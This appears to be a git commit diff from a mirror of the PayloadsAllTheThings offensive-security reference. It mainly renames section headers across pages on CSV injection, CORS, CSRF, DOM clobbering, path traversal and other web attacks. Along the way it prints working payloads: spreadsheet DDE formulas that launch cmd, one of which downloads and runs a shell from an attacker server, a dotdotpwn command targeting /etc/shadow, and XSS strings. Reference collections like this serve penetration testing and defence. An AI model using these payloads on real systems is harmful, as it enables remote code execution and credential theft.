mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 01:15:25 +00:00
Normalize page header for CSRF, DNS, DOS, Dependencies
This commit is contained in:
parent
d80f73a829
commit
2deb20a6f1
@ -5,7 +5,7 @@
|
||||
|
||||
## Summary
|
||||
|
||||
* [Examples](#examples)
|
||||
* [Methodology](#methodology)
|
||||
* [Review Feature Testing](#review-feature-testing)
|
||||
* [Discount Code Feature Testing](#discount-code-feature-testing)
|
||||
* [Delivery Fee Manipulation](#delivery-fee-manipulation)
|
||||
@ -17,7 +17,7 @@
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Examples
|
||||
## Methodology
|
||||
|
||||
Unlike other types of security vulnerabilities like SQL injection or cross-site scripting (XSS), business logic errors do not rely on problems in the code itself (like unfiltered user input). Instead, they take advantage of the normal, intended functionality of the application, but use it in ways that the developer did not anticipate and that have undesired consequences.
|
||||
|
||||
|
@ -7,7 +7,7 @@
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Requirements](#requirements)
|
||||
* [Exploitation](#exploitation)
|
||||
* [Methodology](#methodology)
|
||||
* [Origin Reflection](#origin-reflection)
|
||||
* [Null Origin](#null-origin)
|
||||
* [XSS on Trusted Origin](#xss-on-trusted-origin)
|
||||
@ -33,7 +33,7 @@
|
||||
* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null`
|
||||
|
||||
|
||||
## Exploitation
|
||||
## Methodology
|
||||
|
||||
Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`.
|
||||
|
||||
|
@ -7,15 +7,18 @@
|
||||
|
||||
## Summary
|
||||
|
||||
- [Add a cookie](#add-a-cookie)
|
||||
- [Add a cookie - XSS Bypass](#add-a-cookie---xss-bypass)
|
||||
- [Write HTML](#write-html)
|
||||
- [Filter Bypass](#filter-bypass)
|
||||
- [Labs](#labs)
|
||||
- [References](#references)
|
||||
* [Methodology](#methodology)
|
||||
* [Add a cookie](#add-a-cookie)
|
||||
* [Add a cookie - XSS Bypass](#add-a-cookie---xss-bypass)
|
||||
* [Write HTML](#write-html)
|
||||
* [Filter Bypass](#filter-bypass)
|
||||
* [Labs](#labs)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Add a cookie
|
||||
## Methodology
|
||||
|
||||
### Add a cookie
|
||||
|
||||
Requested page
|
||||
|
||||
@ -39,7 +42,7 @@ x-xss-protection: 1; mode=block
|
||||
```
|
||||
|
||||
|
||||
## Add a cookie - XSS Bypass
|
||||
### Add a cookie - XSS Bypass
|
||||
|
||||
Requested page
|
||||
|
||||
@ -71,7 +74,7 @@ X-XSS-Protection:0
|
||||
```
|
||||
|
||||
|
||||
## Write HTML
|
||||
### Write HTML
|
||||
|
||||
Requested page
|
||||
|
||||
|
@ -1,53 +1,49 @@
|
||||
# CSV Injection
|
||||
|
||||
Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
|
||||
> Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
|
||||
|
||||
## Exploit
|
||||
|
||||
## Summary
|
||||
|
||||
* [Methodology](#methodology)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Methodology
|
||||
|
||||
Basic exploits with **Dynamic Data Exchange**.
|
||||
|
||||
* Spawn a calc
|
||||
```powershell
|
||||
DDE ("cmd";"/C calc";"!A0")A0
|
||||
@SUM(1+1)*cmd|' /C calc'!A0
|
||||
=2+5+cmd|' /C calc'!A0
|
||||
=cmd|' /C calc'!'A1'
|
||||
```
|
||||
|
||||
Payload: pop a calc
|
||||
* PowerShell download and execute
|
||||
```powershell
|
||||
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
|
||||
```
|
||||
|
||||
```powershell
|
||||
DDE ("cmd";"/C calc";"!A0")A0
|
||||
@SUM(1+1)*cmd|' /C calc'!A0
|
||||
=2+5+cmd|' /C calc'!A0
|
||||
```
|
||||
* Prefix obfuscation and command chaining
|
||||
```powershell
|
||||
=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
|
||||
=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
|
||||
+thespanishinquisition(cmd|'/c calc.exe'!A
|
||||
= cmd|'/c calc.exe'!A
|
||||
```
|
||||
|
||||
Payload: pop a notepad
|
||||
* Using rundll32 instead of cmd
|
||||
```powershell
|
||||
=rundll32|'URL.dll,OpenURL calc.exe'!A
|
||||
=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A
|
||||
```
|
||||
|
||||
```powershell
|
||||
=cmd|' /C notepad'!'A1'
|
||||
```
|
||||
|
||||
Payload: powershell download and execute
|
||||
|
||||
```powershell
|
||||
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
|
||||
```
|
||||
|
||||
Payload: Prefix obfuscation and command chaining
|
||||
|
||||
```powershell
|
||||
=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
|
||||
=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
|
||||
+thespanishinquisition(cmd|'/c calc.exe'!A
|
||||
= cmd|'/c calc.exe'!A
|
||||
```
|
||||
|
||||
Payload: Using rundll32 instead of cmd
|
||||
|
||||
```powershell
|
||||
=rundll32|'URL.dll,OpenURL calc.exe'!A
|
||||
=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A
|
||||
```
|
||||
|
||||
Payload: Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed.
|
||||
|
||||
```powershell
|
||||
= C m D | '/ c c al c . e x e ' ! A
|
||||
```
|
||||
* Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed.
|
||||
```powershell
|
||||
= C m D | '/ c c al c . e x e ' ! A
|
||||
```
|
||||
|
||||
Technical details of the above payloads:
|
||||
|
||||
|
@ -1,6 +1,6 @@
|
||||
# Common Vulnerabilities and Exposures
|
||||
|
||||
A CVE (Common Vulnerabilities and Exposures) is a unique identifier assigned to a publicly known cybersecurity vulnerability. CVEs help standardize the naming and tracking of vulnerabilities, making it easier for organizations, security professionals, and software vendors to share information and manage risks associated with these vulnerabilities. Each CVE entry includes a brief description of the vulnerability, its potential impact, and details about affected software or systems.
|
||||
> A CVE (Common Vulnerabilities and Exposures) is a unique identifier assigned to a publicly known cybersecurity vulnerability. CVEs help standardize the naming and tracking of vulnerabilities, making it easier for organizations, security professionals, and software vendors to share information and manage risks associated with these vulnerabilities. Each CVE entry includes a brief description of the vulnerability, its potential impact, and details about affected software or systems.
|
||||
|
||||
## Summary
|
||||
|
||||
|
@ -24,9 +24,10 @@
|
||||
|
||||
## Tools
|
||||
|
||||
* [Burp Suite](https://portswigger.net/burp)
|
||||
* [OWASP ZAP](https://github.com/zaproxy/zaproxy)
|
||||
* [Clickjack](https://github.com/machine1337/clickjack)
|
||||
* [portswigger/burp](https://portswigger.net/burp)
|
||||
* [zaproxy/zaproxy](https://github.com/zaproxy/zaproxy)
|
||||
* [machine1337/clickjack](https://github.com/machine1337/clickjack)
|
||||
|
||||
|
||||
## Methodology
|
||||
|
||||
|
@ -10,8 +10,9 @@
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [CSPT to XSS](#cspt-to-xss)
|
||||
* [CSPT to CSRF](#cspt-to-xss)
|
||||
* [Methodology](#methodology)
|
||||
* [CSPT to XSS](#cspt-to-xss)
|
||||
* [CSPT to CSRF](#cspt-to-xss)
|
||||
* [Labs](#labs)
|
||||
* [References](#references)
|
||||
|
||||
@ -21,7 +22,9 @@
|
||||
* [doyensec/CSPTBurpExtension](https://github.com/doyensec/CSPTBurpExtension) - CSPT is an open-source Burp Suite extension to find and exploit Client-Side Path Traversal.
|
||||
|
||||
|
||||
## CSPT to XSS
|
||||
## Methodology
|
||||
|
||||
### CSPT to XSS
|
||||
|
||||
![](https://matanber.com/images/blog/cspt-query-param.png)
|
||||
|
||||
@ -35,7 +38,7 @@ A post-serving page calls the fetch function, sending a request to a URL with at
|
||||
* Final payload is `https://example.com/static/cms/news.html?newsitemid=../pricing/default.js?cb=alert(document.domain)//`
|
||||
|
||||
|
||||
## CSPT to CSRF
|
||||
### CSPT to CSRF
|
||||
|
||||
A CSPT is redirecting legitimate HTTP requests, allowing the front end to add necessary tokens for API calls, such as authentication or CSRF tokens. This capability can potentially be exploited to circumvent existing CSRF protection measures.
|
||||
|
||||
|
@ -6,7 +6,7 @@
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Exploits](#exploits)
|
||||
* [Methodology](#methodology)
|
||||
* [Basic commands](#basic-commands)
|
||||
* [Chaining commands](#chaining-commands)
|
||||
* [Argument injection](#argument-injection)
|
||||
@ -46,7 +46,7 @@
|
||||
* [projectdiscovery/interactsh](https://github.com/projectdiscovery/interactsh) - An OOB interaction gathering server and client library
|
||||
|
||||
|
||||
## Exploits
|
||||
## Methodology
|
||||
|
||||
Command injection, also known as shell injection, is a type of attack in which the attacker can execute arbitrary commands on the host operating system via a vulnerable application. This vulnerability can exist when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this context, the system shell is a command-line interface that processes commands to be executed, typically on a Unix or Linux system.
|
||||
|
||||
|
@ -9,7 +9,7 @@
|
||||
* [Methodology](#methodology)
|
||||
* [Payloads](#payloads)
|
||||
* [HTML GET - Requiring User Interaction](#html-get---requiring-user-interaction)
|
||||
* [HTML GET - No User Interaction)](#html-get---no-user-interaction)
|
||||
* [HTML GET - No User Interaction](#html-get---no-user-interaction)
|
||||
* [HTML POST - Requiring User Interaction](#html-post---requiring-user-interaction)
|
||||
* [HTML POST - AutoSubmit - No User Interaction](#html-post---autosubmit---no-user-interaction)
|
||||
* [HTML POST - multipart/form-data with file upload - Requiring User Interaction](#html-post---multipartform-data-with-file-upload---requiring-user-interaction)
|
||||
@ -22,7 +22,7 @@
|
||||
|
||||
## Tools
|
||||
|
||||
* [XSRFProbe - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.](https://github.com/0xInfection/XSRFProbe)
|
||||
* [0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe) - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.
|
||||
|
||||
|
||||
## Methodology
|
||||
|
@ -5,7 +5,7 @@
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Exploitation](#exploitation)
|
||||
* [Methodology](#methodology)
|
||||
* [Protection Bypasses](#protection-bypasses)
|
||||
* [0.0.0.0](#0000)
|
||||
* [CNAME](#CNAME)
|
||||
@ -15,11 +15,11 @@
|
||||
|
||||
## Tools
|
||||
|
||||
- [Singularity of Origin](https://github.com/nccgroup/singularity) - is a tool to perform DNS rebinding attacks.
|
||||
- [Singularity of Origin Web Client](http://rebind.it/) (manager interface, port scanner and autoattack)
|
||||
- [nccgroup/singularity](https://github.com/nccgroup/singularity) - A DNS rebinding attack framework.
|
||||
- [rebind.it](http://rebind.it/) - Singularity of Origin Web Client.
|
||||
|
||||
|
||||
## Exploitation
|
||||
## Methodology
|
||||
|
||||
First, we need to make sure that the targeted service is vulnerable to DNS rebinding.
|
||||
It can be done with a simple curl request:
|
||||
@ -75,6 +75,7 @@ $ dig www.example.com +noall +answer
|
||||
localhost.example.com. 381 IN CNAME localhost.
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [How Do DNS Rebinding Attacks Work? - nccgroup - Apr 9, 2019](https://github.com/nccgroup/singularity/wiki/How-Do-DNS-Rebinding-Attacks-Work%3F)
|
||||
|
@ -1,22 +1,15 @@
|
||||
# Dom Clobbering
|
||||
# DOM Clobbering
|
||||
|
||||
> DOM Clobbering is a technique where global variables can be overwritten or "clobbered" by naming HTML elements with certain IDs or names. This can cause unexpected behavior in scripts and potentially lead to security vulnerabilities.
|
||||
|
||||
## Summary
|
||||
|
||||
* [Methodology](#methodology)
|
||||
* [Lab](#lab)
|
||||
* [Exploit](#exploit)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Lab
|
||||
|
||||
* [Lab: Exploiting DOM clobbering to enable XSS](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-xss-exploiting-dom-clobbering)
|
||||
* [Lab: Clobbering DOM attributes to bypass HTML filters](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-clobbering-attributes-to-bypass-html-filters)
|
||||
* [Lab: DOM clobbering test case protected by CSP](https://portswigger-labs.net/dom-invader/testcases/augmented-dom-script-dom-clobbering-csp/)
|
||||
|
||||
|
||||
## Exploit
|
||||
## Methodology
|
||||
|
||||
Exploitation requires any kind of `HTML injection` in the page.
|
||||
|
||||
@ -124,6 +117,13 @@ Exploitation requires any kind of `HTML injection` in the page.
|
||||
* DomPurify allows the protocol `cid:`, which doesn't encode double quote (`"`): `<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:"onerror=alert(1)//">`
|
||||
|
||||
|
||||
## Lab
|
||||
|
||||
* [PortSwigger - Exploiting DOM clobbering to enable XSS](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-xss-exploiting-dom-clobbering)
|
||||
* [PortSwigger - Clobbering DOM attributes to bypass HTML filters](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-clobbering-attributes-to-bypass-html-filters)
|
||||
* [PortSwigger - DOM clobbering test case protected by CSP](https://portswigger-labs.net/dom-invader/testcases/augmented-dom-script-dom-clobbering-csp/)
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [Bypassing CSP via DOM clobbering - Gareth Heyes - 05 June 2023](https://portswigger.net/research/bypassing-csp-via-dom-clobbering)
|
@ -5,14 +5,17 @@
|
||||
|
||||
## Summary
|
||||
|
||||
* [Examples](#examples)
|
||||
* [Methodology](#methodology)
|
||||
* [Locking Customer Accounts](#locking-customer-accounts)
|
||||
* [File Limits on FileSystem](#file-limits-on-filesystem)
|
||||
* [Memory Exhaustion - Technology Related](#memory-exhaustion---technology-related)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Examples
|
||||
## Methodology
|
||||
|
||||
Here are some examples of Denial of Service (DoS) attacks. These examples should serve as a reference for understanding the concept, but any DoS testing should be conducted cautiously, as it can disrupt the target environment and potentially result in loss of access or exposure of sensitive data.
|
||||
|
||||
|
||||
### Locking Customer Accounts
|
||||
|
||||
|
@ -5,21 +5,22 @@
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Exploit](#exploitation)
|
||||
* [Methodology](#methodology)
|
||||
* [NPM Example](#npm-example)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
* [Confused](https://github.com/visma-prodsec/confused)
|
||||
* [visma-prodsec/confused](https://github.com/visma-prodsec/confused) - Tool to check for dependency confusion vulnerabilities in multiple package management systems
|
||||
|
||||
|
||||
## Exploit
|
||||
## Methodology
|
||||
|
||||
Look for `npm`, `pip`, `gem` packages, the methodology is the same : you register a public package with the same name of private one used by the company and then you wait for it to be used.
|
||||
|
||||
|
||||
### NPM example
|
||||
### NPM Example
|
||||
|
||||
* List all the packages (ie: package.json, composer.json, ...)
|
||||
* Find the package missing from https://www.npmjs.com/
|
||||
|
@ -5,7 +5,7 @@
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Basic exploitation](#basic-exploitation)
|
||||
* [Methodology](#methodology)
|
||||
* [16 bits Unicode encoding](#16-bits-unicode-encoding)
|
||||
* [UTF-8 Unicode encoding](#utf-8-unicode-encoding)
|
||||
* [Bypass "../" replaced by ""](#bypass--replaced-by-)
|
||||
@ -21,15 +21,16 @@
|
||||
* [Labs](#labs)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
- [dotdotpwn - https://github.com/wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn)
|
||||
- [wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn) - The Directory Traversal Fuzzer
|
||||
```powershell
|
||||
git clone https://github.com/wireghoul/dotdotpwn
|
||||
perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b
|
||||
```
|
||||
|
||||
## Basic exploitation
|
||||
|
||||
## Methodology
|
||||
|
||||
We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter.
|
||||
|
||||
@ -258,12 +259,12 @@ The following log files are controllable and can be included with an evil payloa
|
||||
|
||||
## Labs
|
||||
|
||||
* [File path traversal, simple case](https://portswigger.net/web-security/file-path-traversal/lab-simple)
|
||||
* [File path traversal, traversal sequences blocked with absolute path bypass](https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass)
|
||||
* [File path traversal, traversal sequences stripped non-recursively](https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively)
|
||||
* [File path traversal, traversal sequences stripped with superfluous URL-decode](https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode)
|
||||
* [File path traversal, validation of start of path](https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path)
|
||||
* [File path traversal, validation of file extension with null byte bypass](https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass)
|
||||
* [PortSwigger - File path traversal, simple case](https://portswigger.net/web-security/file-path-traversal/lab-simple)
|
||||
* [PortSwigger - File path traversal, traversal sequences blocked with absolute path bypass](https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass)
|
||||
* [PortSwigger - File path traversal, traversal sequences stripped non-recursively](https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively)
|
||||
* [PortSwigger - File path traversal, traversal sequences stripped with superfluous URL-decode](https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode)
|
||||
* [PortSwigger - File path traversal, validation of start of path](https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path)
|
||||
* [PortSwigger - File path traversal, validation of file extension with null byte bypass](https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass)
|
||||
|
||||
|
||||
## References
|
||||
|
Loading…
Reference in New Issue
Block a user